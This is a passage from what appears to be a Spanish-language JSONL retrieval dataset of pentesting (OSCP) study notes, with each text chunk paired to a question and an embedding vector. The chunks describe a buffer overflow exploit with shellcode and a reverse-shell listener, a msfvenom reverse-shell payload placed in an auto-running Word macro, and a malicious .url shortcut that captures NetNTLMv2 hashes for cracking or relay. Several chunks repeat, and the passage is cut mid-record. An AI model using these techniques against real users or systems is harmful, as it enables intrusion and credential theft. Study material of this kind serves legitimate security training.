-0.19353, -0.0245, -0.06458, -0.10494, 0.00428, -0.02608, 0.06173, 0.10927, 0.02206, 0.09882, 0.09992, -0.02152, -0.0316, 0.00887, -0.04597, -0.03048, -0.03313, 0.08285, -0.02796, 0.01268, -0.01184, 0.0047, 0.03028, -0.0188, -0.02759, -0.10389, 0.02668, 0.02721, -0.11762, 0.10361, -0.02591, 0.02022, 0.05584, 0.04816, 0.04684, -0.00876, 0.01638, -0.01869, 0.06174, 0.0459, -0.04812, -0.01299, -0.02038, 0.1113, -0.07496, 0.0368, -0.00148, 0.03584, 0.06899, -0.03876, -0.03001, -0.02411, -0.0216, 0.02298, -0.06935, -0.0201, -0.07892, 0.01324, 0.02762, -0.02091, 0.02652, -0.00429, -0.00545, -0.02292, -0.03772, -0.02465, 0.02673, -0.01277, -0.06056, -0.00312, 0.01476, -0.02847, -0.00712, -0.01821, 0.01125, -0.06563, 0.03114, 0.00889, 0.0411, 0.05737, 0.04721, 0.0113, -0.03326, -0.03805, 0.07965, -0.02731, -0.01181, -0.06903, -0.05787, 0.07527, -0.08313, 0.01143, 0.03869, 0.02113, 0.00217, 0.00609, 0.00571, -0.026, 0.00475, 0.01089, 0.04259, -0.01352, 0.0287, 0.0327, -0.00613, 0.04471, 0.04643, 0.04387, -0.06809, 0.02672, -0.00986, 0.06762, 0.01481, -0.07793, 0.08417, 0.01557, -0.01917, -0.01037, -0.0254, 0.05314, 0.02411, -0.03558, -0.00856, -0.03137, 0.03725, -0.10283, 0.01469, -0.00997, 0.01152, -0.04224, -0.00277, 0.04256, -0.03186, -0.04824, -0.01533, -0.03508, 0.03155, -0.05684, 0.0461, -0.01237, 0.02223, -0.03714, 0.00013, -0.0332, -0.05424, 0.02157, 0.01424, 0.02154, 0.07803, 0.00915, -0.04511, 0.01436, -0.02887, -0.04366, -0.02583, -0.02078, -0.00516, 0.00371, 0.0335, 0.02424, -0.01328, -0.00568, 0.04444]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 7. Exploit final\n```\nbuffer = prefix + b\"A\"*offset + jmp_esp + b\"\\x90\"*16 + shellcode\n```\nLevanta `nc -lvnp 443` (Reverse shell) y lanza. NOP sled (`\\x90`*16) da margen al decoder.\n\nRelacionado: Metasploit Β· Reverse shell Β· Exploits conocidos Β· OSCP MOC", "indexar": "cual es una alternativa libre a los exploits de Metasploit?", "v": [-0.01997, 0.02601, -0.06873, 0.00884, -0.03307, 0.03056, -0.07214, -0.0538, -0.22574, -0.00811, -0.03682, -0.12714, -0.01407, 0.1396, 0.05718, -0.12131, 0.07233, -0.1231, 0.08908, -0.19336, -0.10686, -0.01383, -0.03805, -0.14531, -0.01917, 0.05691, -0.02592, 0.11693, -0.04471, 0.02403, -0.06608, 0.0542, -0.04791, -0.04915, 0.06125, 0.00416, 0.16668, -0.00328, 0.20753, -0.01713, -0.02674, -0.13191, -0.10719, 0.09191, 0.10295, -0.11484, -0.15436, -0.00187, -0.06087, 0.06304, -0.01915, -0.05004, -0.13502, 0.02954, 0.04519, -0.04833, 0.11148, -0.04465, -0.13549, 0.02943, -0.02398, 0.00979, 0.04983, -0.04559, 0.03525, -0.05922, -0.03868, 0.00596, -0.11067, 0.17006, 0.05403, 0.01663, 0.00692, 0.00271, -0.11007, 0.02912, -0.05972, -0.04032, -0.02185, 0.09226, -0.0016, -0.07616, -0.04271, 0.03447, -0.06477, -0.04037, 0.03783, -0.06877, 0.01508, 0.05003, 0.05716, 0.00244, -0.02224, 0.03325, -0.05388, -0.11559, 0.03823, 0.11139, 0.02202, 0.15847, 0.03859, 0.02309, -0.09745, 0.02387, 0.02208, 0.00527, -0.06504, 0.03643, -0.11258, -0.03229, 0.06265, 0.03488, 0.01741, 0.04701, 0.07268, 0.01881, -0.0363, -0.03301, -0.02341, -0.01125, -0.07647, -0.06621, -0.02228, -0.04647, 0.04062, 0.0702, 0.0069, -0.01813, -0.01093, -0.05045, 0.06447, 0.04661, -0.0079, -0.01987, -0.08255, -0.09879, 0.16246, -0.06255, -0.00175, -0.01065, 0.02264, 0.05338, 0.06038, 0.00251, 0.00358, -0.02523, -0.01482, -0.00893, 0.04058, -0.0722, -0.05823, -0.03636, -0.01903, 0.09599, -0.06173, -0.02249, -0.06941, 0.00901, -0.01594, 0.11369, 0.05623, -0.08735, 0.00646, 0.00911, -0.051, -0.01701, 0.05486, -0.02922, -0.14594, 0.01567, 0.03024, 0.10078, 0.12375, -0.01768, 0.07039, -0.10881, -0.01817, -0.04235, 0.02711, 0.00774, -0.03884, 0.00322, 0.02669, 0.0242, 0.008, -0.05045, 0.04584, -0.02375, 0.00852, -0.03078, 0.02779, -0.00883, -0.03974, -0.01323, -0.03, 0.05696, -0.01074, -0.05993, -0.01311, -0.03012, -0.00409, -0.03166, 0.00068, -0.05318, 0.01843, -0.00013, -0.03643, 0.02263, -0.03235, 0.04478, 0.04341, 0.0162, 0.06492, -0.02061, -0.08589, 0.00849, 0.0138, 0.04656, -0.05504, -0.0535, 0.02862, 0.04369, 0.01507, -0.02686, -0.06459, 0.03709, -0.03128, 0.01191, -0.03149, -0.00254, -0.0298, 0.00504, -0.00156, 0.03394, -0.02275, 7e-05, 0.02315, 0.01395, 0.01561, 0.00244, 0.01901, 0.09125, -0.00915, -0.01148, -0.02863, -0.00954, -0.07369, -0.0281, -0.02099, -0.04407, -0.01095, 0.0011, -0.0113, -0.00204, 0.04494, 0.0199]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Client-side attacks\n\n> Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside.", "indexar": "con que puedo atacar a un usuario que abre un enlace?", "v": [-0.01909, 0.13803, -0.16677, -0.06926, -0.02808, 0.0163, -0.0264, 0.03473, -0.17195, -0.04392, 0.0238, -0.19243, -0.08529, 0.05756, 0.07069, -0.05325, 0.0379, 0.09586, 0.13834, 0.03202, 0.11216, -0.01759, -0.00995, -0.02516, -0.05678, -0.10267, 0.0347, 0.05308, -0.01512, -0.09948, -0.14338, 0.04336, 0.05484, 0.0141, 0.12534, -0.00495, -0.00628, 0.10757, 0.14247, 0.072, -0.03557, -0.02954, -0.19876, 0.00836, -0.04441, 0.09036, -0.01506, -0.06437, 0.07215, 0.04658, 0.05944, -0.09471, -0.21103, -0.04334, -0.05839, 0.06812, 0.1734, -0.03549, 0.03058, -0.0251, -0.02628, 0.05369, 0.07979, 0.00565, 0.02266, -0.08035, 0.02883, 0.05785, -0.04533, 0.05603, -0.03328, 0.04586, -0.10665, 0.01483, -0.00519, 0.09262, 0.00529, 0.05195, 0.08981, 0.09471, -0.02852, -0.06169, -0.0239, -0.00157, -0.05291, 0.00788, 0.12293, -0.04022, -0.01506, -0.14346, 0.09484, 0.10069, -0.02248, -0.02775, -0.09219, -0.04963, -0.03234, -0.06361, -0.03717, 0.01185, -0.01338, 0.05837, -0.13407, 0.10806, 0.00488, -0.0256, 0.01156, -0.10861, 0.02209, -0.08002, 0.01905, -0.02032, -0.00923, -0.09278, -0.00701, 0.03304, -0.11844, -0.01545, -0.06518, -0.06953, -0.03637, -0.02497, 0.01019, 0.06081, -0.02301, -0.00947, 0.02104, 0.00898, -0.04319, -0.07044, -0.07125, 0.04196, 0.07338, 0.03149, -0.0048, -0.01649, -0.01731, -0.1085, -0.03413, 0.06789, 0.07405, 0.09373, -0.0094, -0.01696, 0.02083, -0.01887, -0.05229, -0.06029, -0.13736, -0.04966, -0.0113, 0.00632, 0.03698, 0.07998, -0.03088, 0.00185, 0.01666, -0.02678, 0.0419, 0.09679, -0.05998, 0.10292, -0.03136, -0.02677, -0.01618, -0.03922, -0.03965, -0.0689, 0.0178, 0.02245, 0.00058, 0.06995, -0.00173, 0.00435, 0.06729, -0.05266, -0.025, -0.01532, 0.00331, -0.01159, -0.02958, -0.09216, -0.06, 0.01405, -0.05318, -0.02931, -0.01932, 0.03112, 0.03172, 0.0596, -0.01812, 0.04355, 0.07335, -0.0038, 0.04837, -0.04774, -0.02517, 0.07097, -0.00938, -0.01152, 0.00547, -0.03159, -0.03051, -0.02412, 0.00534, 0.0212, -0.04375, 0.02052, -0.03721, 0.02236, 0.03116, -0.01509, 0.09312, -0.06177, -0.10323, -0.00859, 0.0051, 0.04451, 0.0326, -0.01911, 0.04315, 0.09886, 0.0505, 0.01023, 0.05037, 0.0201, -0.06255, -0.12191, 0.00556, -0.0257, -0.03336, -0.06874, 0.00037, -0.03603, -0.01071, 0.00411, 0.02711, 0.00725, -0.07443, 0.00298, -0.008, 0.04953, -0.01861, -0.05183, 0.00358, -0.0498, -0.0776, -0.01787, -0.02806, -0.095, -0.0193, 0.02207, 0.0152, -0.02296, 0.05683, 0.03033]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Client-side attacks\n\n> Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside.", "indexar": "que tecnica sirve para realizar ataques al lado del cliente?", "v": [-0.05645, 0.00979, -0.24269, -0.14098, -0.00664, -0.12465, 0.03705, 0.06205, 0.03927, 0.05825, -0.01496, -0.0969, 0.02625, -0.05537, 0.11974, -0.03108, 0.06771, -0.12093, 0.22308, -0.00257, 0.02974, 0.01695, -0.04671, 0.03186, -0.0804, -0.02376, 0.07362, -0.08499, -0.16137, -0.01859, 0.01386, -0.07255, 0.00235, -0.00718, 0.08882, -0.04412, -0.0415, 0.04575, 0.06758, 0.06583, -0.00107, -0.12184, -0.16301, -0.08699, 0.16733, -0.00134, 0.06972, -0.03049, 0.00648, 0.05704, 0.02361, 0.05129, -0.15235, -0.07111, -0.07839, -0.0478, 0.06421, -0.11047, 0.06064, -0.07372, -0.01789, 0.02273, 0.06662, 0.02829, 0.10356, -0.11143, 0.01531, -0.02412, 0.03757, -0.04831, -0.06189, 0.03788, -0.01082, 0.00617, -0.03839, -0.01962, 0.03108, 0.14422, 0.05516, -0.07332, -0.01861, 0.07161, -0.20554, -0.05568, -0.08436, -0.01629, 0.0624, -0.02726, -0.04955, -0.11303, 0.09773, 0.03589, -0.01497, -0.08793, -0.04272, -0.00372, -0.03046, -0.10633, -0.00696, -0.02995, 0.04811, -0.07014, -0.05334, 0.02094, -0.01486, 0.06514, 0.02579, -0.10787, -0.03742, -0.09291, -0.10198, 0.01841, -0.06553, -0.03739, -0.03429, -0.1086, -0.04502, -0.056, 0.02061, 0.02261, -0.0581, 0.02159, 0.0212, 0.10106, -0.08561, 7e-05, -0.01491, 0.01068, -0.02116, -0.07939, -0.0177, 0.02375, 0.0033, 0.05909, -0.02461, 0.03815, 0.07079, -0.10603, -0.0564, 0.01544, 0.03223, 0.12863, -0.06997, -0.03101, 0.04366, -0.01011, 0.072, -0.07796, -0.05063, -0.01292, 0.05564, -0.00152, -0.02802, 0.0624, -0.06606, -0.07605, -0.01415, -0.09733, -0.01454, 0.12619, 0.0135, 0.06983, -0.00909, 0.02672, -0.01975, -0.04599, -0.0792, -0.01823, 0.1263, 0.04688, 0.01253, 0.01649, -0.02256, -0.07418, 0.00997, 0.02644, -0.04871, -0.01734, 0.00032, -0.03505, -0.05194, -0.11461, -0.0217, 0.02677, 0.00567, -0.02503, 0.03822, -0.00235, 0.04845, 0.00277, -0.05933, -0.02306, -0.06853, 0.03574, -0.02809, -0.06883, -0.05792, -0.01317, -0.03764, -0.01353, 0.01818, -0.02388, -0.02958, -0.04386, 0.02127, 0.09458, -0.00625, -0.02541, -0.02992, 0.01894, 0.03454, -0.06644, 0.09404, -0.03316, -0.04998, -0.02584, 0.03475, -0.00734, 0.00472, 0.01045, 0.03691, -0.04318, -0.01408, 0.00536, -0.03208, 0.0439, -0.01722, -0.06728, 0.02424, 0.04637, 0.0097, -0.02217, -0.00585, -0.01545, 0.04664, -0.01481, 0.05519, -0.02385, -0.05425, -0.02763, 0.01006, -0.00542, -0.00732, -0.04695, 0.01139, -0.02219, -0.11904, -0.01188, -0.01546, -0.05498, -0.01766, 0.00902, 0.02333, 0.03339, 0.03684, -0.0198]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Client-side attacks\n\n> Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside.", "indexar": "cual es una herramienta para atacar usuarios sin necesidad de servir el contenido?", "v": [-0.02045, 0.08334, -0.10215, -0.13413, 0.03232, -0.12386, -0.09241, -0.06821, -0.02616, 0.03787, -0.02636, -0.15081, -0.02301, -0.05676, 0.04338, -0.00066, 0.08562, -0.07314, 0.09241, 0.10239, 0.03128, 0.01515, -0.04046, 0.0057, -0.18418, -0.00237, 0.05218, -0.00171, -0.17638, 0.07511, -0.04476, -0.00303, 0.02636, -0.04154, -0.01972, -0.07159, -0.06244, 0.05334, -0.02933, 0.15921, -0.01432, 0.06854, -0.12445, -0.00854, -0.01547, 0.0787, 0.01521, -0.01359, 0.04488, 0.09698, 0.05462, -0.05794, -0.14073, -0.0295, -0.03168, -0.10192, 0.20913, -0.22091, 0.0343, -0.08737, -0.14409, 0.02504, 0.02122, -0.06204, -0.00703, -0.08836, -0.02747, 0.02996, -0.07531, 0.09666, -0.06602, 0.02475, 0.00137, -0.03512, 0.00049, -0.00031, 0.02222, 0.04495, -0.00649, 0.03267, 0.08009, -0.03697, -0.08622, -0.01236, -0.09869, -0.10296, 0.12736, -0.08394, 0.01722, -0.11758, 0.06604, 0.12126, -0.011, -0.00318, -0.00744, -0.05536, 0.10991, -0.07526, 0.00597, 0.00879, 0.10338, -0.04901, -0.12413, 0.0676, 0.01037, -0.01971, -0.0218, -0.10911, -0.05854, -0.05676, 0.03142, -0.07427, 0.03485, -0.00922, 0.01844, -0.00673, -0.07197, -0.06321, 0.00457, -0.10099, -0.01377, 0.03675, -0.0569, -0.07037, 0.05766, 0.02919, 0.00425, 0.01548, -0.01889, -0.12728, 0.01782, -0.06099, -0.01828, 0.04047, -0.05408, -0.07085, 0.05757, -0.15831, -0.05644, 0.00054, 0.01674, 0.02407, -0.0708, -0.07301, 0.05404, 0.03783, 0.06584, -0.04576, -0.13452, -0.00511, -0.0403, -0.01768, -0.0243, 0.03075, -0.03111, -0.0226, -0.06608, -0.01705, -0.11592, 0.04195, -0.04251, -0.07618, 0.05828, 0.00337, -0.01025, -0.11454, 0.01029, 0.00794, 0.08693, 0.02015, 0.05519, -0.00806, 0.05196, 0.00481, -0.00131, -0.0833, -0.05956, -0.00691, -0.01684, -0.04446, -0.03631, -0.06365, -0.07516, 0.00325, -0.05334, -0.08383, -0.01729, 0.01053, 0.03479, 0.0398, -0.05236, 0.02434, 0.02867, -0.0399, 0.06179, -0.04679, -0.03484, -0.04, 0.04724, -0.01636, -0.01103, -0.05201, -0.03935, -0.02008, 0.02104, 0.05609, 0.00023, -0.02754, -0.0181, -0.00318, 0.0573, -0.00133, 0.02062, -0.01458, -0.05088, -0.03014, 0.01154, 0.00715, -0.01009, 0.01436, 0.01288, 0.00411, 0.02974, -0.03065, 0.0068, 0.06416, -0.03936, -0.02047, -0.01181, -0.03939, -0.02275, -0.06245, -0.01737, 0.00522, 0.03966, -0.05125, 0.05169, -0.0397, -0.07847, -0.06257, -0.0429, 0.0777, 0.00681, -0.01239, -0.00496, -0.03291, -0.05168, -0.01743, -0.07612, -0.09194, -0.0321, 0.01726, 0.06809, -0.01529, 0.06182, -0.01903]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Macro de Word (VBA)\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # β†’ msfvenom\npython3 split.py # parte el payload codificado en trozos de 50 chars para el VBA\n```\n- VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell.\n- **Guardar como \"Documento de Word 97-2003\" (.doc)** para que conserve la macro.\n- Verificar: `olevba evil.doc`.", "indexar": "que programa puedo usar para crear macros en Word que ejecuten cΓ³digo PowerShell?", "v": [-0.05387, -0.07229, -0.02712, -0.18648, -0.08666, -0.12746, 0.0483, -0.00012, -0.0821, -0.17289, -0.21041, -0.06627, 0.0229, -0.1669, -0.01592, 0.00883, 0.14018, -0.09252, -0.0311, 0.05847, 0.03154, -0.08369, -0.12592, -0.10241, -0.00601, 0.09318, -0.03756, 0.00472, -0.12327, -0.02256, -0.0394, 0.06808, 0.07565, -0.08015, -0.07823, 0.11846, 0.00608, 0.06447, -0.00894, 0.2206, -0.04758, 0.1925, -0.11953, 0.05748, -0.01485, 0.0326, 0.08455, -0.00106, 0.00684, -0.00052, -0.01336, -0.08744, -0.11601, -0.00407, 0.04663, -0.11231, 0.07775, -0.10085, -0.22042, 0.03839, -0.0369, -0.00382, 0.01178, -0.02779, -0.06693, 0.00192, 0.07096, 0.01179, -0.03038, 0.15647, -0.08657, 0.03599, 0.01838, -0.0342, 0.10059, 0.03146, 0.01302, -0.10896, 0.04492, 0.05512, -0.0799, 0.00467, -0.01161, -0.0278, -0.08158, -0.02793, -0.0124, -0.0952, 0.01081, -0.04412, 0.0363, 0.00167, -0.00215, 0.11013, 0.10418, -0.03165, 0.03844, 0.01447, 0.02559, 0.03322, 0.0353, -0.12916, -0.06774, 0.04645, 0.09177, 0.04822, 0.07432, 0.05744, -0.05309, 0.02922, -0.00822, -0.07839, -0.0285, -0.07517, -0.02764, -0.01938, -0.03087, -0.06192, -0.02339, -0.09019, -0.04024, 0.03998, -0.08828, 0.07244, 0.07782, 0.04201, 0.02285, 0.06372, -0.066, 0.01368, -0.01255, -0.01497, 0.01906, -0.03632, -0.0485, 0.01974, 0.06217, 0.03879, -0.01802, -0.0272, -0.01497, 0.01192, -0.02589, 0.03059, -0.0339, 0.05476, -0.03883, -0.00644, -0.00998, 0.05573, 0.06103, 0.01751, -0.039, 0.00929, -0.10068, 0.00237, 0.03065, 0.01104, -0.05589, 0.02044, -0.14133, -0.01844, -0.07127, -0.00954, 0.0523, -0.08248, -0.01162, -0.02158, 0.06037, 0.04606, 0.00779, 0.06533, 0.0798, -0.02423, 0.06989, 0.00591, 0.00906, -0.00767, -0.06153, -0.05222, -0.05613, 0.00546, 0.03089, -0.03073, -0.01288, 0.01296, 0.0501, 0.0424, -0.03486, -0.00378, -0.07301, 0.06215, 0.05951, -0.06149, 0.00072, 0.01585, 0.02725, -0.00283, -0.01097, -0.11162, -0.01095, 0.03529, -0.01149, -0.02853, 0.09056, 0.05215, -0.02457, 0.02807, 0.01038, 0.08775, 0.04183, 0.00054, 0.03607, 0.02855, -0.06335, -0.0529, -0.02465, 0.06562, 0.07387, 0.02592, -0.02325, -0.01704, -0.01283, 0.02888, 0.02519, -0.02738, -0.03759, -0.00554, -0.01032, 0.03895, -0.00763, -0.02393, -0.01643, -0.01387, 0.03243, -0.01972, -0.00935, 0.01481, -0.00664, -0.02808, -0.03211, 0.07872, 0.02376, -0.03304, -0.06416, 0.0252, -0.05783, -0.04827, -0.03528, 0.00616, -0.0055, -0.02169, 0.03743, -0.02917, 0.0037, -0.00122]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Macro de Word (VBA)\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # β†’ msfvenom\npython3 split.py # parte el payload codificado en trozos de 50 chars para el VBA\n```\n- VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell.\n- **Guardar como \"Documento de Word 97-2003\" (.doc)** para que conserve la macro.\n- Verificar: `olevba evil.doc`.", "indexar": "cΓ³mo montoy un archivo Word que contenga una macro que corra cΓ³digo remoto?", "v": [0.06035, -0.10891, 0.02931, -0.05763, -0.12275, -0.10462, 0.11243, 0.14615, -0.17573, -0.17324, -0.16522, -0.16931, 0.1509, -0.06913, 0.13852, -0.01852, 0.1878, 0.07486, 0.03757, -0.0415, 0.05456, -0.16173, 0.05022, -0.05836, 0.02874, -0.06933, 0.0083, 0.04475, -0.04538, -0.07504, 0.09768, 0.02692, 0.15411, 0.08585, -0.08558, 0.10752, 0.06597, 0.08654, -0.16222, 0.06776, -0.06205, 0.05975, -0.14263, -0.01593, -0.03663, -0.1014, 0.03782, 0.08058, 0.05683, 0.06011, 0.00044, -0.10972, 0.01239, -0.0441, -0.07009, -0.05019, 0.14014, -0.01181, -0.01821, 0.02738, -0.04196, -0.01519, -0.08247, -0.01291, -0.13725, 0.01029, 0.00811, 0.03331, -0.10856, 0.03242, -0.07747, 0.03017, 0.03585, 0.00239, 0.03177, 0.02691, -0.02608, -0.13009, 0.0074, 0.00497, -0.08771, -0.04585, 0.01009, -0.01088, -0.17324, -0.11122, 0.0367, -0.04124, 0.10523, -0.04905, 0.05457, -0.05456, -0.02505, 0.0392, -0.00818, -0.01322, -0.01275, 0.01825, -0.00074, 0.00699, -0.04705, 0.04403, -0.02522, -0.02425, 0.11342, 0.11167, 0.04974, 0.0556, -0.04314, -0.02596, 0.01812, -0.00508, 0.00183, -0.02859, 0.00993, -0.1024, -0.04806, -0.01249, 0.01697, -0.10579, -0.05731, 0.00706, -0.07613, 0.1049, 0.00657, -0.05904, -0.03622, 0.05037, -0.07765, -0.04781, -0.0199, 0.05593, -0.0084, -0.11001, 0.02669, 0.01981, 0.0581, 0.04995, -0.00396, 0.00152, -0.02118, -0.03034, -0.01109, 0.06383, 0.0487, 0.09631, -0.00884, -0.03164, -0.08479, 0.02494, 0.01949, 0.03136, -0.05193, -0.05125, -0.08982, 0.0414, 0.01778, -0.07974, -0.0574, 0.01899, -0.05193, -0.01528, 0.01261, -0.04831, 0.00942, -0.09176, 0.00142, -0.07749, 0.02542, -0.04644, -0.00823, -0.01413, -0.01635, -0.0237, 0.02209, -0.02334, 0.02458, 0.00781, -0.01753, -0.08895, -0.06483, 0.01391, 0.03073, 0.00801, -0.00345, -0.05818, 0.07833, 0.00066, -0.0042, 0.00196, -0.03615, 0.02063, -0.04876, -0.00596, -0.01314, 0.00106, -0.06571, 0.02024, 0.04176, -0.02564, -0.00554, -0.03018, 0.0194, -0.04179, 0.04684, 0.02106, -0.05975, 0.02598, -0.0522, 0.09465, 0.03867, 0.01814, 0.03261, -0.02224, -0.03779, -0.0184, 0.00597, 0.06049, 0.01509, -0.02255, 0.00809, 0.04555, 0.04965, -0.00156, -0.0019, 0.01083, -0.00081, 0.0133, 0.00583, -0.01264, -0.00835, 0.04275, -0.02053, 0.00559, 0.09939, -0.00177, 0.00921, -0.01353, -0.01172, -0.05597, 0.02132, 0.06156, -0.0151, -0.06412, -0.05455, -0.006, -0.08191, 0.02925, -0.01565, -0.0262, -0.01521, -0.04699, 0.01803, -0.00534, 0.02922, -0.0526]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Macro de Word (VBA)\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # β†’ msfvenom\npython3 split.py # parte el payload codificado en trozos de 50 chars para el VBA\n```\n- VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell.\n- **Guardar como \"Documento de Word 97-2003\" (.doc)** para que conserve la macro.\n- Verificar: `olevba evil.doc`.", "indexar": "cual es la manera de generar y guardar macros de VBA con scripts complejos?", "v": [0.10426, -0.06572, -0.04167, -0.05449, -0.08224, -0.12375, 0.08649, -0.06934, 0.06076, -0.21568, 0.0142, -0.0851, 0.04978, 0.0015, 0.14151, 0.12573, 0.07568, -0.21379, -0.03071, 0.1056, 0.14486, -0.01733, 0.09375, -0.05683, -0.12014, -0.0418, -0.03045, -0.10857, -0.21989, 0.08591, 0.00221, 0.07944, 0.04666, -0.10364, -0.08306, 0.01537, -0.02021, 0.0254, -0.02351, 0.13529, -0.05915, 0.1127, -0.0489, 0.07309, -0.0216, -0.16733, 0.04784, 0.06931, -0.00987, -0.06143, -0.06132, 0.03118, -0.08582, 0.02497, -0.04014, -0.04842, 0.00314, -0.16202, 0.03748, 0.11227, -0.06501, 0.03469, 0.0192, 0.03801, 0.00065, -0.08407, 0.00255, -0.09067, -0.11785, 0.00578, -0.10393, 0.09334, -0.02579, 0.04568, 0.06117, 0.06651, -0.06769, -0.07326, 0.00301, 0.09553, -0.07561, -0.08059, -0.02886, 0.02854, -0.07889, -0.09538, -0.07738, -0.01421, -0.02789, -0.03639, 0.06816, -0.10928, -0.0056, -0.00974, -0.04328, -0.0902, 0.06581, 0.04836, 0.0416, 0.02703, -0.07097, -0.05899, -0.09033, 0.0855, 0.00257, 0.08267, 0.02047, 0.04126, 0.02001, 0.03619, 0.06173, 0.0369, -0.00741, 0.02802, 0.07173, -0.03262, 0.00545, 0.03127, -0.02581, -0.07237, -0.01506, 0.06315, -0.08583, -0.0073, 0.02909, -0.04003, 0.03446, 0.03628, -0.02883, 0.03731, -0.1315, -0.05684, -0.06529, -0.06911, -0.04848, 0.06252, 0.08577, -0.03807, -0.04321, -0.0612, 0.01136, 0.02841, 0.05653, 0.04126, 0.05613, 0.02254, -0.02609, -0.03675, -0.04151, -0.02957, 0.02178, -0.0111, -0.02421, -0.06889, -0.07277, -0.02804, -0.02796, -0.07564, -0.00334, 0.00958, -0.01294, 0.01186, -0.01623, -0.00739, 0.03219, -0.08948, -0.03385, -0.02917, 0.06196, 0.06596, -0.01607, -0.04846, 0.02532, -0.0713, -0.00821, -0.03834, -0.01393, -0.06977, 0.01448, -0.03514, -0.01542, -0.0489, 0.00154, 0.10981, -0.03815, -0.07348, 0.01889, -0.01026, 0.00583, 0.01498, -0.02222, 0.09403, -0.05855, -0.03024, 0.0234, 0.00795, -0.0178, -0.014, 0.02809, 0.0433, -0.03402, 0.06404, 0.03513, -0.02199, 0.01688, 0.06916, -0.11239, 0.00041, -0.02306, -0.02605, 0.06935, 0.03005, -0.00093, -0.00208, -0.06488, -0.06102, -0.01844, 0.04498, 0.00619, -0.034, 0.0104, 0.00219, 0.03378, -0.10409, -0.0635, 0.00028, 0.01314, 0.05568, 0.00589, -0.01465, -0.0092, -0.00504, -0.04187, -0.00882, 0.08864, 0.0416, -0.00726, -0.00305, 0.00309, -0.0421, 0.01672, 0.06074, -0.00636, -0.09335, -0.0487, -0.07542, -0.03703, 0.05685, 0.0143, -0.00028, -0.02051, -0.00993, -0.0049, 0.04144, 0.01664, -0.08151]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Acceso directo malicioso (.url / .lnk)\n```ini\n[InternetShortcut]\nURL=file://TU_IP\nIconFile=\\\\TU_IP\\SERVER\\%USERNAME%.icon\nIconIndex=1\n```\n- El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB β†’ **capturas su hash NetNTLMv2**.\n```bash\nimpacket-smbserver -smb2support SERVER $(pwd) # o Responder β†’ Herramientas (Γ­ndice)\n```\n- El hash capturado β†’ Cracking de contraseΓ±as (`hashcat -m 5600`) o relay.\n\nRelacionado: AV evasion Β· Cracking de contraseΓ±as Β· Authentication attacks Β· OSCP MOC", "indexar": "que herramienta sirve para capturar hashes NetNTLMv2 con un acceso directo malicioso", "v": [-0.14429, -0.02941, -0.01173, -0.17688, 0.06137, -0.08309, -0.18124, 0.04585, -0.05174, 0.06411, -0.07876, -0.10146, 0.0388, -0.02603, 0.01695, 0.13385, 0.0228, -0.07757, 0.00157, 0.00519, -0.06145, 0.01195, -0.09132, -0.18081, -0.01556, -0.09744, 0.02648, 0.08897, -0.21838, 0.03557, -0.06829, -0.03614, -0.07831, 0.07858, 0.02022, -0.14367, -0.00184, 0.079, 0.01035, 0.08757, 0.09366, 0.10954, -0.13451, 0.07128, 0.03432, -0.06676, -0.08245, -0.03395, 0.01089, -0.07514, 0.05095, 0.00379, -0.20367, -0.06528, -0.10866, -0.0529, 0.13649, -0.08533, 0.02928, -0.16275, -0.08497, -0.02225, -0.04901, -0.10973, 0.00779, -0.06413, 0.06369, 0.00931, -0.14351, 0.03947, -0.05827, 0.08212, 0.07654, 0.02611, -0.04089, 0.02692, -0.05702, 0.0768, 0.06001, 0.04383, 0.03821, -0.13151, -0.04955, -0.00828, -0.15402, -0.03565, 0.07346, -0.03885, -0.01935, -0.1186, 0.04187, 0.04582, 0.01716, 0.01272, 0.02879, -0.05759, 0.04032, -0.08246, 0.06256, -0.08728, 0.06771, -0.04132, -0.11668, 0.07214, -0.04381, 0.00239, 0.07222, -0.02506, -0.09025, 0.01332, 0.04787, 0.00115, -0.01504, 0.02347, -0.00983, 0.01398, -0.01711, -0.0613, 0.0313, -0.06299, -0.03801, -0.01772, -0.00123, -0.02131, 0.00803, 0.00362, -0.02726, 0.03602, 0.00435, -0.04604, -0.03496, 0.02062, -0.05974, 0.00037, -0.03996, -0.09994, 